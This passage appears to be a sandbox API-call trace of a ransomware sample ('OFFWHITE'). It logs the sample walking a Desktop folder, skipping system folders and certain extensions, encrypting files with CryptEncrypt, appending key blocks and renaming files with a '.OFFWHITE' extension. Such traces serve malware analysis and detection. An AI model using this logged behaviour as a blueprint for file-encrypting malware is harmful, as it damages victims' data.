Flags=0x0, Size=0x10) returned 0x5487a8 [0132.297] GetProcessHeap () returned 0x500000 [0132.297] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0132.297] GetProcessHeap () returned 0x500000 [0132.297] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0132.297] GetProcessHeap () returned 0x500000 [0132.297] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0132.297] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.297] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.297] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0132.297] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.297] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.297] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0132.297] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.297] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.297] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295e310*=0x100) returned 1 [0132.298] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.298] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.298] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295e30c*=0x100) returned 1 [0132.298] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x9231, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.298] SetLastError (dwErrCode=0x0) [0132.298] WriteFile (in: hFile=0xb0, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0132.300] GetLastError () returned 0x0 [0132.300] GetLastError () returned 0x0 [0132.300] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x9331, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.300] WriteFile (in: hFile=0xb0, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0132.300] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x9431, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.300] WriteFile (in: hFile=0xb0, lpBuffer=0x547f78*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x547f78*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0132.301] GetProcessHeap () returned 0x500000 [0132.301] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x9231) returned 0x5577b0 [0132.301] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.301] ReadFile (in: hFile=0xb0, lpBuffer=0x5577b0, nNumberOfBytesToRead=0x9231, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x5577b0*, lpNumberOfBytesRead=0x295e540*=0x9231, lpOverlapped=0x0) returned 1 [0132.304] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.304] WriteFile (in: hFile=0xb0, lpBuffer=0x5577b0*, nNumberOfBytesToWrite=0x9231, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5577b0*, lpNumberOfBytesWritten=0x295e54c*=0x9231, lpOverlapped=0x0) returned 1 [0132.304] GetProcessHeap () returned 0x500000 [0132.304] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5577b0 | out: hHeap=0x500000) returned 1 [0132.304] CloseHandle (hObject=0xb0) returned 1 [0132.310] GetProcessHeap () returned 0x500000 [0132.310] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0132.310] GetProcessHeap () returned 0x500000 [0132.310] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0132.311] GetProcessHeap () returned 0x500000 [0132.311] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0132.311] GetProcessHeap () returned 0x500000 [0132.311] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0132.311] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OdweMCCYu.jpg" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OdweMCCYu.jpg") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OdweMCCYu.jpg" [0132.311] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OdweMCCYu.jpg", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OdweMCCYu.jpg.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OdweMCCYu.jpg.OFFWHITE" [0132.311] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OdweMCCYu.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\odwemccyu.jpg"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OdweMCCYu.jpg.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\odwemccyu.jpg.offwhite")) returned 1 [0132.313] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd6e5d090, ftCreationTime.dwHighDateTime=0x1d5d8a0, ftLastAccessTime.dwLowDateTime=0x7b3c8ab0, ftLastAccessTime.dwHighDateTime=0x1d5dc4f, ftLastWriteTime.dwLowDateTime=0x7b3c8ab0, ftLastWriteTime.dwHighDateTime=0x1d5dc4f, nFileSizeHigh=0x0, nFileSizeLow=0x13ccf, dwReserved0=0x440042, dwReserved1=0x295f070, cFileName="on4Rkp8XBzEJR_5fGm.doc", cAlternateFileName="ON4RKP~1.DOC")) returned 1 [0132.313] lstrcmpiW (lpString1="on4Rkp8XBzEJR_5fGm.doc", lpString2=".") returned 1 [0132.313] lstrcmpiW (lpString1="on4Rkp8XBzEJR_5fGm.doc", lpString2="..") returned 1 [0132.313] lstrcmpiW (lpString1="on4Rkp8XBzEJR_5fGm.doc", lpString2="...") returned 1 [0132.313] lstrcmpiW (lpString1="on4Rkp8XBzEJR_5fGm.doc", lpString2="windows") returned -1 [0132.313] lstrcmpiW (lpString1="on4Rkp8XBzEJR_5fGm.doc", lpString2="$recycle.bin") returned 1 [0132.313] lstrcmpiW (lpString1="on4Rkp8XBzEJR_5fGm.doc", lpString2="rsa") returned -1 [0132.313] lstrcmpiW (lpString1="on4Rkp8XBzEJR_5fGm.doc", lpString2="ntuser.dat") returned 1 [0132.313] lstrcmpiW (lpString1="on4Rkp8XBzEJR_5fGm.doc", lpString2="programdata") returned -1 [0132.313] lstrcmpiW (lpString1="on4Rkp8XBzEJR_5fGm.doc", lpString2="appdata") returned 1 [0132.313] lstrcmpiW (lpString1="on4Rkp8XBzEJR_5fGm.doc", lpString2="program files") returned -1 [0132.313] lstrcmpiW (lpString1="on4Rkp8XBzEJR_5fGm.doc", lpString2="program files (x86)") returned -1 [0132.313] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0132.314] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="on4Rkp8XBzEJR_5fGm.doc" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\on4Rkp8XBzEJR_5fGm.doc") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\on4Rkp8XBzEJR_5fGm.doc" [0132.314] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.314] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.314] PathFindExtensionW (pszPath="on4Rkp8XBzEJR_5fGm.doc") returned=".doc" [0132.314] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0132.314] lstrcmpiW (lpString1=".doc", lpString2=".log") returned -1 [0132.314] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0132.314] lstrcmpiW (lpString1=".doc", lpString2=".cmd") returned 1 [0132.314] lstrcmpiW (lpString1=".doc", lpString2=".com") returned 1 [0132.314] lstrcmpiW (lpString1=".doc", lpString2=".cpl") returned 1 [0132.314] lstrcmpiW (lpString1=".doc", lpString2=".ini") returned -1 [0132.314] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0132.314] lstrcmpiW (lpString1=".doc", lpString2=".url") returned -1 [0132.314] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1 [0132.314] lstrcmpiW (lpString1=".doc", lpString2=".mp3") returned -1 [0132.314] lstrcmpiW (lpString1=".doc", lpString2=".pif") returned -1 [0132.315] lstrcmpiW (lpString1=".doc", lpString2=".mp4") returned -1 [0132.315] lstrcmpiW (lpString1=".doc", lpString2=".OFFWHITE") returned -1 [0132.315] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0132.315] lstrcmpiW (lpString1="on4Rkp8XBzEJR_5fGm.doc", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0132.315] GetProcessHeap () returned 0x500000 [0132.315] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x547f88 [0132.315] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\on4Rkp8XBzEJR_5fGm.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\on4rkp8xbzejr_5fgm.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0132.315] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=81103) returned 1 [0132.316] GetProcessHeap () returned 0x500000 [0132.316] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0132.316] GetProcessHeap () returned 0x500000 [0132.316] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0132.316] GetProcessHeap () returned 0x500000 [0132.316] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0132.316] GetProcessHeap () returned 0x500000 [0132.316] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0132.316] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.316] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.316] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0132.316] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.316] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.316] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0132.316] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.317] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.317] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295e310*=0x100) returned 1 [0132.317] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.317] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.317] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295e30c*=0x100) returned 1 [0132.317] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x13ccf, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.317] SetLastError (dwErrCode=0x0) [0132.317] WriteFile (in: hFile=0xb0, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0132.321] GetLastError () returned 0x0 [0132.321] GetLastError () returned 0x0 [0132.321] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x13dcf, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.322] WriteFile (in: hFile=0xb0, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0132.322] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x13ecf, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.322] WriteFile (in: hFile=0xb0, lpBuffer=0x547f88*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x547f88*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0132.322] GetProcessHeap () returned 0x500000 [0132.322] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x13ccf) returned 0x5577b0 [0132.322] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.322] ReadFile (in: hFile=0xb0, lpBuffer=0x5577b0, nNumberOfBytesToRead=0x13ccf, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x5577b0*, lpNumberOfBytesRead=0x295e540*=0x13ccf, lpOverlapped=0x0) returned 1 [0132.328] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.328] WriteFile (in: hFile=0xb0, lpBuffer=0x5577b0*, nNumberOfBytesToWrite=0x13ccf, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5577b0*, lpNumberOfBytesWritten=0x295e54c*=0x13ccf, lpOverlapped=0x0) returned 1 [0132.329] GetProcessHeap () returned 0x500000 [0132.329] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5577b0 | out: hHeap=0x500000) returned 1 [0132.329] CloseHandle (hObject=0xb0) returned 1 [0132.331] GetProcessHeap () returned 0x500000 [0132.331] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0132.331] GetProcessHeap () returned 0x500000 [0132.331] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0132.332] GetProcessHeap () returned 0x500000 [0132.332] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0132.332] GetProcessHeap () returned 0x500000 [0132.332] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0132.332] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\on4Rkp8XBzEJR_5fGm.doc" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\on4Rkp8XBzEJR_5fGm.doc") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\on4Rkp8XBzEJR_5fGm.doc" [0132.332] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\on4Rkp8XBzEJR_5fGm.doc", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\on4Rkp8XBzEJR_5fGm.doc.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\on4Rkp8XBzEJR_5fGm.doc.OFFWHITE" [0132.332] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\on4Rkp8XBzEJR_5fGm.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\on4rkp8xbzejr_5fgm.doc"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\on4Rkp8XBzEJR_5fGm.doc.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\on4rkp8xbzejr_5fgm.doc.offwhite")) returned 1 [0132.334] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b80a0b0, ftCreationTime.dwHighDateTime=0x1d5e40c, ftLastAccessTime.dwLowDateTime=0x1e8b92d0, ftLastAccessTime.dwHighDateTime=0x1d5e793, ftLastWriteTime.dwLowDateTime=0x1e8b92d0, ftLastWriteTime.dwHighDateTime=0x1d5e793, nFileSizeHigh=0x0, nFileSizeLow=0x10ad2, dwReserved0=0x440042, dwReserved1=0x295f070, cFileName="pKJn3Tfh8.mp3", cAlternateFileName="PKJN3T~1.MP3")) returned 1 [0132.334] lstrcmpiW (lpString1="pKJn3Tfh8.mp3", lpString2=".") returned 1 [0132.334] lstrcmpiW (lpString1="pKJn3Tfh8.mp3", lpString2="..") returned 1 [0132.334] lstrcmpiW (lpString1="pKJn3Tfh8.mp3", lpString2="...") returned 1 [0132.334] lstrcmpiW (lpString1="pKJn3Tfh8.mp3", lpString2="windows") returned -1 [0132.334] lstrcmpiW (lpString1="pKJn3Tfh8.mp3", lpString2="$recycle.bin") returned 1 [0132.334] lstrcmpiW (lpString1="pKJn3Tfh8.mp3", lpString2="rsa") returned -1 [0132.334] lstrcmpiW (lpString1="pKJn3Tfh8.mp3", lpString2="ntuser.dat") returned 1 [0132.335] lstrcmpiW (lpString1="pKJn3Tfh8.mp3", lpString2="programdata") returned -1 [0132.335] lstrcmpiW (lpString1="pKJn3Tfh8.mp3", lpString2="appdata") returned 1 [0132.335] lstrcmpiW (lpString1="pKJn3Tfh8.mp3", lpString2="program files") returned -1 [0132.335] lstrcmpiW (lpString1="pKJn3Tfh8.mp3", lpString2="program files (x86)") returned -1 [0132.335] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0132.335] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="pKJn3Tfh8.mp3" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pKJn3Tfh8.mp3") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pKJn3Tfh8.mp3" [0132.335] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.335] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.335] PathFindExtensionW (pszPath="pKJn3Tfh8.mp3") returned=".mp3" [0132.335] lstrcmpiW (lpString1=".mp3", lpString2=".exe") returned 1 [0132.335] lstrcmpiW (lpString1=".mp3", lpString2=".log") returned 1 [0132.335] lstrcmpiW (lpString1=".mp3", lpString2=".cab") returned 1 [0132.335] lstrcmpiW (lpString1=".mp3", lpString2=".cmd") returned 1 [0132.336] lstrcmpiW (lpString1=".mp3", lpString2=".com") returned 1 [0132.336] lstrcmpiW (lpString1=".mp3", lpString2=".cpl") returned 1 [0132.336] lstrcmpiW (lpString1=".mp3", lpString2=".ini") returned 1 [0132.336] lstrcmpiW (lpString1=".mp3", lpString2=".dll") returned 1 [0132.336] lstrcmpiW (lpString1=".mp3", lpString2=".url") returned -1 [0132.336] lstrcmpiW (lpString1=".mp3", lpString2=".ttf") returned -1 [0132.336] lstrcmpiW (lpString1=".mp3", lpString2=".mp3") returned 0 [0132.336] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x25102dd0, ftCreationTime.dwHighDateTime=0x1d5db33, ftLastAccessTime.dwLowDateTime=0xbb434e90, ftLastAccessTime.dwHighDateTime=0x1d5d863, ftLastWriteTime.dwLowDateTime=0xbb434e90, ftLastWriteTime.dwHighDateTime=0x1d5d863, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x440042, dwReserved1=0x295f070, cFileName="plGXx-", cAlternateFileName="")) returned 1 [0132.336] lstrcmpiW (lpString1="plGXx-", lpString2=".") returned 1 [0132.337] lstrcmpiW (lpString1="plGXx-", lpString2="..") returned 1 [0132.337] lstrcmpiW (lpString1="plGXx-", lpString2="...") returned 1 [0132.337] lstrcmpiW (lpString1="plGXx-", lpString2="windows") returned -1 [0132.337] lstrcmpiW (lpString1="plGXx-", lpString2="$recycle.bin") returned 1 [0132.337] lstrcmpiW (lpString1="plGXx-", lpString2="rsa") returned -1 [0132.337] lstrcmpiW (lpString1="plGXx-", lpString2="ntuser.dat") returned 1 [0132.337] lstrcmpiW (lpString1="plGXx-", lpString2="programdata") returned -1 [0132.337] lstrcmpiW (lpString1="plGXx-", lpString2="appdata") returned 1 [0132.337] lstrcmpiW (lpString1="plGXx-", lpString2="program files") returned -1 [0132.337] lstrcmpiW (lpString1="plGXx-", lpString2="program files (x86)") returned -1 [0132.337] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0132.337] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="plGXx-" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\plGXx-") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\plGXx-" [0132.337] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\plGXx-", lpString2="\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\plGXx-\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\plGXx-\\" [0132.337] lstrcpyW (in: lpString1=0x295e370, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\plGXx-\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\plGXx-\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\plGXx-\\" [0132.337] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\plGXx-\\", lpString2="*.*" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\plGXx-\\*.*") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\plGXx-\\*.*" [0132.337] FindFirstFileW (in: lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\plGXx-\\*.*", lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x25102dd0, ftCreationTime.dwHighDateTime=0x1d5db33, ftLastAccessTime.dwLowDateTime=0xbb434e90, ftLastAccessTime.dwHighDateTime=0x1d5d863, ftLastWriteTime.dwLowDateTime=0xbb434e90, ftLastWriteTime.dwHighDateTime=0x1d5d863, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295debc, dwReserved1=0x4c0a66fd, cFileName=".", cAlternateFileName="")) returned 0x544650 [0132.341] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0132.341] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x25102dd0, ftCreationTime.dwHighDateTime=0x1d5db33, ftLastAccessTime.dwLowDateTime=0xbb434e90, ftLastAccessTime.dwHighDateTime=0x1d5d863, ftLastWriteTime.dwLowDateTime=0xbb434e90, ftLastWriteTime.dwHighDateTime=0x1d5d863, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295debc, dwReserved1=0x4c0a66fd, cFileName="..", cAlternateFileName="")) returned 1 [0132.341] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0132.341] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0132.342] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3bcc5e90, ftCreationTime.dwHighDateTime=0x1d5dd27, ftLastAccessTime.dwLowDateTime=0xe9c14190, ftLastAccessTime.dwHighDateTime=0x1d5e11f, ftLastWriteTime.dwLowDateTime=0xe9c14190, ftLastWriteTime.dwHighDateTime=0x1d5e11f, nFileSizeHigh=0x0, nFileSizeLow=0xe0d6, dwReserved0=0x295debc, dwReserved1=0x4c0a66fd, cFileName="1hUSW_AfObc55t.png", cAlternateFileName="1HUSW_~1.PNG")) returned 1 [0132.342] lstrcmpiW (lpString1="1hUSW_AfObc55t.png", lpString2=".") returned 1 [0132.342] lstrcmpiW (lpString1="1hUSW_AfObc55t.png", lpString2="..") returned 1 [0132.342] lstrcmpiW (lpString1="1hUSW_AfObc55t.png", lpString2="...") returned 1 [0132.342] lstrcmpiW (lpString1="1hUSW_AfObc55t.png", lpString2="windows") returned -1 [0132.342] lstrcmpiW (lpString1="1hUSW_AfObc55t.png", lpString2="$recycle.bin") returned 1 [0132.342] lstrcmpiW (lpString1="1hUSW_AfObc55t.png", lpString2="rsa") returned -1 [0132.342] lstrcmpiW (lpString1="1hUSW_AfObc55t.png", lpString2="ntuser.dat") returned -1 [0132.342] lstrcmpiW (lpString1="1hUSW_AfObc55t.png", lpString2="programdata") returned -1 [0132.342] lstrcmpiW (lpString1="1hUSW_AfObc55t.png", lpString2="appdata") returned -1 [0132.342] lstrcmpiW (lpString1="1hUSW_AfObc55t.png", lpString2="program files") returned -1 [0132.342] lstrcmpiW (lpString1="1hUSW_AfObc55t.png", lpString2="program files (x86)") returned -1 [0132.342] lstrcpyW (in: lpString1=0x295e168, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\plGXx-\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\plGXx-\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\plGXx-\\" [0132.342] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\plGXx-\\", lpString2="1hUSW_AfObc55t.png" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\plGXx-\\1hUSW_AfObc55t.png") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\plGXx-\\1hUSW_AfObc55t.png" [0132.342] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.342] lstrcmpiW (lpString1="kernel32.dll", 